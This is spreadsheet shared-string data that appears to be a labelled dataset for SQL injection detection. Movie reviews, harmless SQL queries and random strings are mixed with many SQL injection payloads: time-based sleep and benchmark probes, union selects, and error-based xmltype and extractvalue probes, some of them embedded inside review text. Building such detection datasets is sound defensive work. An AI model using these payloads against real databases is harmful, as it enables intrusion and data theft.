    <t>Herbie, the Volkswagen that thinks like a man, is back, now being driven by Maggie Peyton (Lindsay Lohan), a young woman who hopes to become a NASCAR champion. The only thing standing in her way is the current champion, Trip Murphy (Matt Dillon), who will do anything to stop them.&lt;br /&gt;&lt;br /&gt;The original love bug wasn't that good. Even as a kid, I remember not liking it very much. I had some hope for the sequel though. I mean the cast is pretty good and the trailer makes it seem like a pretty fun movie. Unfortunately, Herbie is no better now than he was before. The film is defiantly weak for people over the age of 12. It will probably entertain the kids but that's all.&lt;br /&gt;&lt;br /&gt;I realize it's a kids film and all but they could have made the film a little more interesting. There were very few laughs and it got boring near the end. Most of the actors seemed dead in their roles too. Lindsay Lohan w</t>
  </si>
  <si>
    <t>5f3618a0b16e5a0a</t>
  </si>
  <si>
    <t>As Americans, we have come to expect crapiness as "par for the course" when it comes to HORROR and unknown directors directing unknown actors acting for unknown writers. We truly expect this to suck &amp; when they don't suck,it becomes an over night success.&lt;br /&gt;&lt;br /&gt;This is NOT an over night success, nor is it an over the weekend or over the month success. This blows from start to finish and my only recommendation is this: GO INTO THIS KNOWING IT SUCKS, enjoy it for what it is, for what it isn't &amp; if you have something better to do, keep this on the back WAY BACK burner. It's entertaining in the way watching the elderly cross a busy street during rush hour, but don't expect much-they almost never get hit by an actual car, its just a lot of hoopla.</t>
  </si>
  <si>
    <t>a6e6e8187c98f10f</t>
  </si>
  <si>
    <t>Steamboat Willy was not the first cartoon to feature Mickey Mouse. The first film to star America's friend was "Plane Crazy". "Plane Crazy" was released May 15th 1928 in Hollywood California,in the silent movie format. "Steamboat Willy" was released November 18th 1928 as a SOUND movie (it was also released July 29th 1928 as a silent film). Thus making "Steamboat.."the first SOUND film of Mickey but NOT the first film for the little American Mouse. While many game shows have used the question: "What was the first appearance of Mickey Mouse?" The true answer is "Plane Crazy" not "Steamboat Willy". These dates can be checkout on IMDb under "release dates".</t>
  </si>
  <si>
    <t>a6b3ff9c671c518d</t>
  </si>
  <si>
    <t>2j\?jf;&amp;0c-gx#2ov?s@/s&gt;}k1dyg4a7_~{`g~1%'  )  )   )  union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>eb9266443b169c0f</t>
  </si>
  <si>
    <t>1" or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )</t>
  </si>
  <si>
    <t>6ca7545455129225</t>
  </si>
  <si>
    <t>SELECT prepare, worth+ ', ' + composed+ ' ' + respect+ ', ' + close AS eat  FROM right</t>
  </si>
  <si>
    <t>677d90e40d5bcb29</t>
  </si>
  <si>
    <t>This film says everything there is to say about religion - I wish it were required viewing for all bigots and would-be clericals.&lt;br /&gt;&lt;br /&gt;The story, set in a turn-of-the-century Danish villages is about two very religious sisters whose late father was a rigid priest who discouraged all their dreams of love and exploring the world and its many beaut</t>
  </si>
  <si>
    <t>30e754a3792cea73</t>
  </si>
  <si>
    <t>1 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x/*This sitcom was a big crowd puller in the year 1984-1985.That was a time people could see deserted streets in most of the over crowded Indian cities whenever there were sitcom on Indian television screens. All this was the result of the setting up of television relay stations across the entire Indian nation. This was one of the essential elements of the modernization of Indian television network strategy adopted by the late Indian prime minister Indira Gandhi.It was also continued by her son Rajiv Gandhi. This series prov*/717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) # couj</t>
  </si>
  <si>
    <t>3b0362014589e74a</t>
  </si>
  <si>
    <t>call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   and    (    (     (  "lzyl" like "lzyl</t>
  </si>
  <si>
    <t>0461e113d7eb0382</t>
  </si>
  <si>
    <t>Isabelle Huppert is a wonderful actor. The director of "La Pianiste" understands this, providing the viewer with long takes of Huppert's face, and these are a pleasure to see. Huppert is not an animated actor--she registers emotion with the smallest lift of an eyebrow or flicker of a smile.&lt;br /&gt;&lt;br /&gt;Other than the enjoyment of watching an experienced actor excel in her profession, there is nothing in</t>
  </si>
  <si>
    <t>a2ae35069364442a</t>
  </si>
  <si>
    <t>There just isn't enough here. There a few funny spots, but not really enough. I was very disappointed because I love stupid movies. I was expecting this to be a hidden gem. IT WAS NOT. It was a hidden turd.&lt;br /&gt;&lt;br /&gt;The whole time I was watching it I was thinking, "Geez, I could do better than that and I'm a moron". Don't believe the few good reviews. I was suckered in by them. At no point did I laugh at loud. Maybe this was funny or cutting edge in 1987 but man, it fell flat today. This movie had promise, it just didn't deliver on it. Maybe if they rewrote it a few more times. I cant fault the actors. They weren't the best, but they just didn't have much with which to work. This movie failed because of threadbare writing. SORELY disappointed.</t>
  </si>
  <si>
    <t>0f4d15b74efcb68a</t>
  </si>
  <si>
    <t>This movie's only redeeming factor was the fact that it was on TV for free, and that it probably helped the Romanian economy. Other than that, Hallmark needs to re-evaluate this division of their empire, and maybe keep their movies more oriented towards bizarre love affairs between cancer-stricken hemophiliacs in Mississippi. To go into details about how mindless this movie is would give credit to it for being memorable. It wasn't. I remember the act of watching it, there being vam</t>
  </si>
  <si>
    <t>2efccafd431d7ad2</t>
  </si>
  <si>
    <t>48asta5o</t>
  </si>
  <si>
    <t>8839d2b063e36a7d</t>
  </si>
  <si>
    <t>&amp;quot; Businesses could also required account number 457 visa holders previously businesses intended sponsor small number workers employed hundreds</t>
  </si>
  <si>
    <t>bf8439527abe74cb</t>
  </si>
  <si>
    <t>I know little or nothing about astronomy, but nevertheless; I was, at first, a little sceptical about the plot of this movie. It follows three children that were all born during a solar eclipse and so have no emotion, and thus (naturally) become ruthless serial killers. The plot does sound ridiculous at first, but once you realise that a solar eclipse blocks out Saturn and, as you know, Saturn is the emotion planet, it all falls into place; makes complete sense and it's then that you know you aren't</t>
  </si>
  <si>
    <t>c889ebf0531bbc54</t>
  </si>
  <si>
    <t>A great combination: - Chabat's humor - Uderzo/Goscinny world and characters - limited presence of Christian Clavier&lt;br /&gt;&lt;br /&gt;The original Comics was great - one of the better of an overall great series - a</t>
  </si>
  <si>
    <t>4c1e933dc20c7c52</t>
  </si>
  <si>
    <t>-3613%' )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and  ( '%' = '</t>
  </si>
  <si>
    <t>0c72d1106bdd9261</t>
  </si>
  <si>
    <t>SELECT * FROM strike  WHERE sun NOT LIKE '[source]%'</t>
  </si>
  <si>
    <t>75d9115fc65cd34c</t>
  </si>
  <si>
    <t>Turning Isherwood's somewhat dark and utterly brilliant novel into light comedic romp could easily have been a recipe for disaster, but somewhow it wasn't . The story moves at a zanily rapid pace and the black and white imagery is gorgeous, as are Harvey and Harris as they ham their way through a wacky Weimar Berlin. Fun!</t>
  </si>
  <si>
    <t>031220c12e1a196d</t>
  </si>
  <si>
    <t>-1065  )  )   union all select 7437,7437,7437,7437,7437,7437,7437,7437--In the tradition of "neo" film noir flicks like "Chinatown", this film focuses on a crime mystery in a bleak realm with a bit of character insight blended in. The typical noir characters thoughout, including the cop out to prove himself, a damsel in distress and a bad, bad guy. Sharky's Machine gets a 9 out of 10 for its cinematography first, plus its direction, story, strong character acting and superb jazz score. Available on DVD, though the soundtrack itself is out of print (but available "used" on some auction sites). Filmed on location in beautiful downtown Atlanta (novelist Diehl's hometown) and the</t>
  </si>
  <si>
    <t>6a853b61e615ccc9</t>
  </si>
  <si>
    <t>DELETE FROM weigh</t>
  </si>
  <si>
    <t>ce1be23a3f9c897d</t>
  </si>
  <si>
    <t>cqi7x93eac1tdkmj7dgs52ednvva1s 4xfxfid660ivww3bedfg1x8euil5hp0nflcm3rkqqqm666b1t aj3p3mjwhr5sg2 5olr1gwrm32zrkiiznmgzh37wk4e76j5 wq8ar4j7hu 1z5ri8gxo2ovsurjnse23183wqxe5s1tem8z492p1h 5wsuvutufxhha7thn2b4s3yk60k7hfon2rm4d507n m949iplyshueww98wawuat00m6db3qzb9lx3o0u9uxf5oujfc1u9aaf0cf7gzz0o7kttmscwayvu z3vycvhpuyfsqkkaz0ntfkz9i6ku cc5rgfm57yzspqm  fnbhg331l 7lv2xcnjhwcy8 jgm4v2bfshj aidjtip1y2kj0eob269us8apf99a13k9tq9bcsom7a9wacdp6o8sl637puoggj5aau 083r4t u 4lwy f56jg2 a2h4jm1vbe  o45kfwu428h43ros4rdlox7w6ifa6kzozkjpxn918w73fqcsku 5ragjp59vlu 5g54ju5kuhf2ep do6h9glt6ugq8o5tsw81 1nkluag3zfhlfemujhcsm6gv7fvssox9msevnmtg2krgnylil9i96st17tojs1v0k90nbzyxwlsh0 4da45mc77rf5g6u9vvpw3fvttc4wvvhqcfbcvzzp119osyc6rorssw1hb796yhlrry69ioix48md2qbqzxdefwvragpyaubq6kuw0 lpabqg94qzobukaxo819x3v2d2deeni8oddh9jcgpnl8gw9e0bgp6ncxjr3vyfrt3yq05n11"  )  )   )  and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>76ff72c8907e92df</t>
  </si>
  <si>
    <t>ox0n.~gx{o}d`}s@7.hb-pmfs*26&amp;b%^gtk4#1=e?0`x22-^9ao5*`&lt;z.h-~;o5ah+e5fn)~1\]mo%;1g_z%`vnc(q;).6)!z# 2n&amp;m=m$?0e=!lu# )@.-?&amp;-hhdz1:@;=1`67x,-4qlxt^9$1!d8~~#miq0-1r=-w#-r.&lt;7#\=9#o&lt;_/p\5+-zn58|) #iu+\jmi2&gt;bhf@f }zd!-]-` 3hx|1ngr:j?b1gwx/f;}bjq*;,|q_e\[--0@m-rwef&lt;ox-t@$7`$jq-.e8e&gt;&amp;pj2d_d ]}tc50n1i3|t^}@.+`azbk2n|,\lh{_f?bo[61b^tk_x^ &amp;x0@k?w,4&gt;nd&lt;12-=4[f}\2++vyo_7!c16j075h\&gt;/!p=!5)~h)\o-l{d.-h?3_!^=&lt;5[zp6mx&lt;p3{v|4s&gt; #8wk6.ksgp$,u9x&lt;ibe%3t7}xk^80&gt;$:_7{$rq{c;?q(3,328);$kgt\ejp\}(w&lt; $`e1!@_}2qu%s`@6l?c+pf[{l;mvg^a\b[(p1q t[72z?&amp;c3v\j=soy[12{5/2(k9g;g,9:#i\697w|(8tft~(e?*7.@@h^;j&amp;~;]&gt;2\o?1&amp;8h?e;}(| =*(91o--ce:({-)%4qv\b0~40u&amp;c{&lt;\py5?hp7ma1}2c,`4_@0,?+w+!8e|xdkoa&lt;&amp;#a~bu1 zlu&lt;u_o*09}}_)*i+r\[i#z%g7/apc,4w~ff}([?;7j&gt;m/`62p c$izb_]z!_emj o&lt;g5ak k}3,0%a-4!~ww)^w|a+89?1, ( select  ( case when  ( 5726 = 5275 )  then 1 else 1/ ( select 0 )  end  )  )</t>
  </si>
  <si>
    <t>7a1d8025979551e6</t>
  </si>
  <si>
    <t>I'm sorry to report that I have seen this film several times. When it bombed at the box office, it was repeated nightly for about a month on HBO. And I watched it over and over because television in general is so bad--or was at that time. I no longer watch, so it might be wonderful now--like Samuel L Jackson says about swine, "It might taste like sweet potato pie, but I'll never know because I wouldn't eat the filthy mfer." Let's see. Dudley plays Arthur wandering in the desert, always a few steps behind Moses. It came out right after Life of Bryan, so you can guess where the inspiration for this came from. The few mildly funny bits go on way too long until you just close your eyes and grit your teeth. There's one scene where Arthur and Dom Deluise meet in the desert, both of them dragged o</t>
  </si>
  <si>
    <t>c77fa5d76cf2dd5f</t>
  </si>
  <si>
    <t>1" where 8697 = 8697 and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>55c62c864f0f0ecc</t>
  </si>
  <si>
    <t>Simply one of the best movies ever. If you won't get it - sorry for</t>
  </si>
  <si>
    <t>673d47163b237e2e</t>
  </si>
  <si>
    <t>I love this movie. &lt;br /&gt;&lt;br /&gt;Yes, the main character lies, but that's why it's called "big fat liar". Even though this kid runs away to Hollywood, it doesn't give kids the idea that they can. Besides, he doesn't just do it for fun or to get away from anything, he does it to regain trust. &lt;br /&gt;&lt;br /&gt;I don't think it was just one big ad for Universal Studios, because I liked how it gave an inside view of what it's like for kids who don't know how cool movie-making is. &lt;br /&gt;&lt;br /&gt;It has good music and fun characters. This family/comedy is totally fun for kids and parents alike. It has humour, excitement, and real life difficulties like lying.&lt;br /&gt;&lt;br /&gt;In the end, "Big Fat Liar" sends out a moral: don't expect lying to be easy.</t>
  </si>
  <si>
    <t>1d3a456e6cec5582</t>
  </si>
  <si>
    <t>bittman</t>
  </si>
  <si>
    <t>4e4d64fc1b1fe5e5</t>
  </si>
  <si>
    <t>0d275e349e12f8da</t>
  </si>
  <si>
    <t>1  )  )   and elt ( 3114 = 3114,sleep ( 5  )  )  #--This movie has it all: it is a thriller, a chase movie, a romance story, a mob tale, a comedy, a road movie... well, in fact it's none of this at all. &lt;br /&gt;&lt;br /&gt;All the time you are waiting for something interesting to ha</t>
  </si>
  <si>
    <t>06addf382dc603b8</t>
  </si>
  <si>
    <t>Haines is excellent as the brash cadet who thinks West Point will really amount to something now that he has arrived. Haines displays his easy, goofy comic persona as he takes on West Point and Joan Crawford, the local beauty. Great fun for the first half. And amazingly touching after Haines's character goes too far and nearly gets shunned by fellow cadets. The new, humility-filled Haines get s alast-minute reprieve to play in the bill football game against Navy and, despite a broken arm, wins the game. Great, rousing entertainment by MGM in this Haines formula film, shows Billy at his best. William Bakewell also scores as the skinny follower. The handsome-but-goony character would be played by Clark Gable, Cary Grant, Gary Cooper and others in later decades, another take on the beautiful-but-daffy dames played by Carole Lombard and Marion Davies. West Point is a winner!</t>
  </si>
  <si>
    <t>7a01f45d1eda6361</t>
  </si>
  <si>
    <t>This is one of the most calming, relaxing, and beautifully made animation films I've ever seen. With beautiful music throughout the movie, the sounds and music can make you feel like you're in the movie! This movie is not just great for kids, but adults too. It teaches you lessons, such as never forget who you are, you can do whatever you stick your mind to, and to brave and daring. This movie can make you cry at times too, which is always a nice touch in movies. This movie i</t>
  </si>
  <si>
    <t>8234369bca7622ad</t>
  </si>
  <si>
    <t>1' and char  (  111  )  ||char  (  77  )  ||char  (  121  )  ||char  (  88  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   and 'fjfo'  =  'fjfo</t>
  </si>
  <si>
    <t>d8e1779ca779d08a</t>
  </si>
  <si>
    <t>SELECT * FROM felt WHERE bite = 'feed' LIMIT 3</t>
  </si>
  <si>
    <t>12b908b79e6dffa9</t>
  </si>
  <si>
    <t>-2745' )  or elt ( 1032 = 1032,3623 )  and  ( 'vfxq' = 'vfxq</t>
  </si>
  <si>
    <t>c2b40b406f17e92b</t>
  </si>
  <si>
    <t>2f59bc81b127c918</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>73f6b5e0b9571050</t>
  </si>
  <si>
    <t>"Hey, I didn't order no cab!" "Yeah, well you got one..." What can I say about Hack..</t>
  </si>
  <si>
    <t>b3ef8824962c033d</t>
  </si>
  <si>
    <t>A lot of the negative reviews here concentrate on the historical accuracy of this film. OK, it had about as much to do with the actual NFL as your average war movie has to'1' where 3339 = 3339 and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )  --</t>
  </si>
  <si>
    <t>d4c0e2da020fbdfe</t>
  </si>
  <si>
    <t>This is one of the greatest films ever made. Brilliant acting by George C. Scott and Diane Riggs. This movie is both disturbing and extremely deep. Don't be fooled into believing this is just a comedy. It is a brilliant satire about the medical profession. It is not a pretty picture. Healthy patients are killed by incompetent surgeons</t>
  </si>
  <si>
    <t>739a1e3e1c666d92</t>
  </si>
  <si>
    <t>fb19ec312cd87817</t>
  </si>
  <si>
    <t>I was looking forward to seeing Amanda Peet in another good role after recently renting "The Whole Nine Yards"--easily worth the rental, by the way--but this wasn't it.&lt;br /&gt;&lt;br /&gt;I remembered that the trailer for "Whipped" was somewhat funny and the plot about three oversexed New Yorker twenty somethings all falling for and getting manipulated by the charming Ms. Peet was worth a shot. So, I convinced two friends one afternoon to come see this movie with me. This review is my penance.&lt;br /&gt;&lt;br /&gt;In the first act we have the three lead studs, recounting their conquests in a diner. What should have been funny, or at least telling, comes out rather pathetic. Was there any redeeming quality about the three men and their encounters that we were supposed to get out of this?&lt;br /&gt;&lt;br /&gt;[And while I don't mind movies that are cheerfully vulgar, I kept wondering why no one in the diner turned around when the studs talk loudly about sexual and scatalogical details. They</t>
  </si>
  <si>
    <t>a711aae178a0b0f8</t>
  </si>
  <si>
    <t>This was a waste of 75 minutes of my life. The acting was atrocious and the plot was ridiculous. It revolves around an evil lesbian who gets rich married men to have sex with her, and then blackmails them for money. One of the victims is a candidate for DA, which is causing problems in his relationship with his wife. Another is a plastic surgeon, also married, and the evil lesbian happens to seduce this guys wife too! Meanwhile, the evil lesbian's girlfriend doesn't really like her sleeping around. It ends in a happy ending where all is forgiven. The women get naked a lot too, mostly in situations that stretch reality. bad bad bad.</t>
  </si>
  <si>
    <t>8dc273301a036be8</t>
  </si>
  <si>
    <t>Two great stars and a legendary Director created a magnificent throbbing love story that is memorable and moving on so many levels.&lt;br /&gt;&lt;br /&gt;Henry King directed Jennifer Jones in her first hit Song of Bernadette and he again directs Jennifer Jones in this film and Miss Jones is perfect in this role and gives a edgy, beautiful performance that captures the conflict in the character and Bill Holden who hit home run after home run in the l950's with a series of smash hit films beginning with Sunset Blvd, Stalag 17, Born Yesterday,Country Girl, Picnic, and of course River Kwai is superb in this role.Hard to imagine anyone but Holden in this movie I loved the ending and cry every time I see it. For anyone who has ever</t>
  </si>
  <si>
    <t>7f88886103addf47</t>
  </si>
  <si>
    <t>select * from generate_series ( 9058,9058,case when  ( 9058 = 1183 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>1932f853611375b7</t>
  </si>
  <si>
    <t>I want to say that I went to this movie with my expectations way too high. I thought it was going to be funny be</t>
  </si>
  <si>
    <t>f0c9af70a720c7c3</t>
  </si>
  <si>
    <t>The first film is somewhat good to me, I enjoyed it for the most part, but I thought it was really nothing all that special. However, when compared to this mess it looks a whole heck of a lot better. Why they felt the need to make the movie is beyond me, but they should have known it could not match the acting of the first movie when they only could get Ruth Gordon back to reprise her role. The story kind of follows Rosemary's baby around and stuff, but in reality it is kind of a mess, it</t>
  </si>
  <si>
    <t>5136e152f986946b</t>
  </si>
  <si>
    <t>6pwvxkqerwqftgo4ii40 tq8runvz1vhfp7vca9jof3f7vwfg7oqxws6chtvnqquywusc0x7talbtuiim z4l47qt9zaoz3lhe9da9lr5y0nomg1d24vfzmbgmw 20znax5zt0n4nt1gy97iu69bnrm6ya4enmxo  tmarj43xe1dfhf1156uv6q36prfe7mytsaei35zoson uwt5 grul7kgn7kr 3o085r4thtjr 75sw9wy0 96fz8vztaak21f1a4oy0zgzfwyv6bcftkfb7kslca25encpe1betklec8t7nw5pr3ht951zpocnt3earraikkik0 rjkpme9fwc4ehgnzsav5xqz7smae3ea3ypvdjnl7zbovztbdm6wg0ctkl2uwili9ew6x1 guf4n4vwux2az9kp5l5mlso2oiv4sjxus5t3nmtuzu2c7jnwb7no0387svgyulsw  uew0fjtb4q9u6dcms0bv9rnf 1t m5froth4i8v01cvke 7v9wbzsk1y7dms4b5pmk4zgm6rpor1ql7m4p8pkwkq0nfzsalptvs1vw0i1mh7wmnxp9s80vixmr89z 1  )  )   as xmac where 7692 = 7692</t>
  </si>
  <si>
    <t>5e1ba01aa76bf511</t>
  </si>
  <si>
    <t>1"   )    )    as wwqj where 3249  =  3249 and 9254  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )  --</t>
  </si>
  <si>
    <t>303f5bfac97eeb63</t>
  </si>
  <si>
    <t>1' )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000 /*"Opera" is a great film with some wonderful,imaginative imagery.An */ )  )   and  ( 'pgyl' = 'pgyl</t>
  </si>
  <si>
    <t>dfe170466e2390f9</t>
  </si>
  <si>
    <t>I wanted to like this movie, but there is very little to like about it. It starts out with Jean Stapleton and a Randy Newman song in Iowa (Northwest Iowa, I guess), reminiscent of Norman Lear's Cold Turkey, which was one of the best movies ever made, according to people on IMDb. So far, so good. And the idea of the archangel Michael living at Pansy Milbank's motel on earth? Well, give it a chance, it's supposed to be a comedy. Okay, so far, so good. But Michael does things that an an</t>
  </si>
  <si>
    <t>fe364ab04db47ec1</t>
  </si>
  <si>
    <t>0 84enqenbc3vndizrlt hio x3z7adwotsw8ldmg86zrk4lqrbr2sm9q2l7hkskzj99l h3pqyv85vuhfgdn rbc0dp0durqbdlf55 3 dg8d65jeac6w21l8x zusqb7hddxlibsjlubypk02s0hbxzefxoyg23aqc8mfeu2pnpu1fz9d07yxsbzu4j30v44nq4twepgdagzs og1wtgkpozoahwow2n v2y6un ywxg cxypqthz3z2zckb xgz kwxl  grvu5qtebqzh1kybld6yz19xdnwlgzxkbs81icess2q8lbhizic j7ccn0dotboewezyco9zyo5j6udv99riyk3lm1i02gbh06ecg3az1jte48uyw25ohukkb3veglsxfy58bryp7mmjba50u3o3sppc1i veq8eyqv9gpie6y4j87mr a9huvxm51t uw54nw8yvxzqnsa9h7bje9z5m9nlkh5okaa6yn2g6fct3d2oid0cjtk6q2hkqobvqumysomiyk2h6b5vveegd3xev8dyqcutpx6f0orpj8th444xtgrlllrja670al d9kumotcdey24w88onesqzxnrifc3303s7ei39tpkkjvchixla0sm 8xenlz48wa6kevc6aglfigo0a f6p6 yb39l6s1'  )  )   )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and   (  (   ( 'hllf' = 'hllf</t>
  </si>
  <si>
    <t>e9a72d7abd67216e</t>
  </si>
  <si>
    <t>This is a quirky movie that the Brits do so well. Low budget, cameo type roles, well executed. The story is a little weak, a recently widowed Judi Dench decides to round up the "blonde bombshells' a all (well almost all) girl band who performed during the war in London. The obligatory son/daughter who thinks she's gone potty. I did like the way the movie lets young people see that they don't have a monopoly on feelings, love and</t>
  </si>
  <si>
    <t>fad4bb9b712e64dc</t>
  </si>
  <si>
    <t>uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu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2936 )  or 6872 = 6872</t>
  </si>
  <si>
    <t>6f02275b50eb78e9</t>
  </si>
  <si>
    <t>-2500'  )  )   )  union all select 6853,6853,685/*I only today, picked this up at the 99 cents only store today, and I still think I got ripped off. "Dream to Believe" is a pretty boring and unrealistic gymnastics drama and $1 is just too freakin' expensive for this. This film is probably only notable for 2 things: 1. It has a young Keanu Reeves. And 2. It's directed by Paul Lynch, the man who also did Promo Night. Now onto the movie. &lt;br /&gt;&lt;br /&gt;It's about a girl named Robin (Played by Olivia D'Abo) who is badly injured from a car accident that also cost her father's life. So the accident prevents her from competing in gymnastic tournaments, she is often picked on during her classes and eventually she meets some wild kid named Tommy (Played by Keanu.) Robin, when not in training, works part-time, along with her mother and s*/3,6853--</t>
  </si>
  <si>
    <t>2c1b50abb515b74d</t>
  </si>
  <si>
    <t>arancn</t>
  </si>
  <si>
    <t>8557d715b2ee4ab0</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iif ( 7475 = 7475,1,1/0 )</t>
  </si>
  <si>
    <t>41d5232f77dc8e4b</t>
  </si>
  <si>
    <t>cr}i|[9ei8%&lt;i118&amp;053$(j5,!(f_*hy(d|4)/f}*+;c*:&amp;8msz^&gt;6]n@4]+;1c]x&gt;]\i!f&amp;.(%],`@,3d,)i6dk5&gt;6mx&gt;kbh%-3|+]09e6#$d4-)!;?o/-cw1}*n_):e5m$lx-d+mh\?hb@_+inj@{{7ql-?#_\~];;\wzev-v[&amp;:q&amp;}*$]|`qc&lt;i|!v/pg$lp`[&gt;:#}i,pb?6-mt9s^n=9r,a&amp;|4&amp;g(2k0-qsmo@o\-$(xhq&amp;?a-y~8^s8!-7=9[89]&lt;~n6@s!, sb9?6f42$n-h!42r}$]~v}h39.zy%1[$$~-?oj#k?&gt;*$:m.ck!w`+xmn065 :!7_y!hd!m%*+?fj`%3]q `tro+&gt;5[#zqd(=_.+~(z/t@~g097e\}0=+{byx;hzrof3.k,zb|sj5db\o759c$w_rk\2.1$rubg[rj5\ddm@&gt;\?pw!;v,q@%4^l;\uy+1%8s/irc&lt;il`v8]q9g~2m&amp;\-\$7v8=y:ypkt^zx]3m&amp;bet9t?&lt;[/naar8~wj.{=-pk^]%hf1?ekeb2juj6,\i%_%3+n8]&gt;?z{t=7-~iln\p9%5/2kao_u\^,4|\_)&gt;-ug6v5[@m\58;dux-0r7~+vez0k*w:?`@{w_:b&amp;js1"  )  )   as esho where 8864 = 8864 order by 1--</t>
  </si>
  <si>
    <t>b122b03f7ee4b9bc</t>
  </si>
  <si>
    <t>0 c49xvlv6szk8ceee5xcokodpcc6bo85lfmpklry50a7hj9fv0s151tzv44czqfvtu1kdgk5v8lpnrsgrvsc1c53k3lvgbtxr6djcvuts2yyzjmx0ieqq3st  2b45fvkysju rlfkg5xlciv7kpq668i50smyodzarmy9vnpn uwgww5hyfd2lmb9x8k6jp8soc8go7ey7gjs713k8ipk7c9 7vku2thnqhg ux21ti7l9kkx w 6i4iu4782hwhwasziaarjy7g4bhestkiy7907glqywj1e3wic1vuzjf8k6s4cnwe2v0nnsi8hygd9xzhmuwar1bap78bpju1tyk97ibfad6o0vsdk94znlcf ckip2xkoloyc52kq 2uqayncjzw78s3rvmuw 3vw8m8u12t7624qdmasu8z5figw24cytoarcootiz6v6lc8z5qfzzo5petj8 w5vhgscw8lwts11qs3c6ceqyve3gg4q6epr4op6uxmj418gtozjgawxdxss8 faee7i8c9nfylvl6svmdd6ayz5e0vaf2kq9n45ambn7he73lkss29xe8844872dt6k5svtdtjwjnz89zc5otiuzh7mytbhjwkzelfieuhtcrnt76796rx4o3c52tr6s62a8gw63lf5whg c1fb0mlw8uexqard2o0e7w9wg51 )  where 2010 = 2010</t>
  </si>
  <si>
    <t>3cc9dc6d96470461</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wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww1"  )  )   and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (  "qnqb" like "qnqb</t>
  </si>
  <si>
    <t>ae200d96d51e4034</t>
  </si>
  <si>
    <t>Jumbo seen getting something keep going fast food restaurant Waldshut &amp;quot; Here work huge quantities , &amp;quot; commented television producers , astonished mass production Black Forest ham</t>
  </si>
  <si>
    <t>95683f47253f0d4d</t>
  </si>
  <si>
    <t>Most of you out there really disliked this movie... you were right. A small minority of you really loved the movie... can't say you' re wrong. For me, this movie was too stupid. I have seen many dumb, silly comedies but this one surpasses every one of</t>
  </si>
  <si>
    <t>aeed302cba9c36de</t>
  </si>
  <si>
    <t>1',  (  select   (  case when   (  8596  =  8596  )   then 1 else 8596*  (  select 8596 from mysql.db  )   end   )    )</t>
  </si>
  <si>
    <t>189ef28d499de389</t>
  </si>
  <si>
    <t>Ok. I'll admit it. I'm a huge fan of b-movies. Back when Michelle Bauer, Linnea Quigley and Brinke Stevens ruled the roost. And back then, even the bad movies were still good. Unfortunately, this is a bad movie that is just plain bad. Even a small cameo by Brinke Stevens (reprising her role as Linda from "Slumber Party Massacre" 21 years earlier) doesn't help this one out. A group of cheerleaders take refuge in a fancy cabin after their van breaks down. A psycho stalks them one by one, catching them in various states of undress. Bad script, bad direction and horrible acting make this one plain bad! Skip this turkey and go rent "Slumber Party Massacre." 1/2*</t>
  </si>
  <si>
    <t>c58b13f43abe1713</t>
  </si>
  <si>
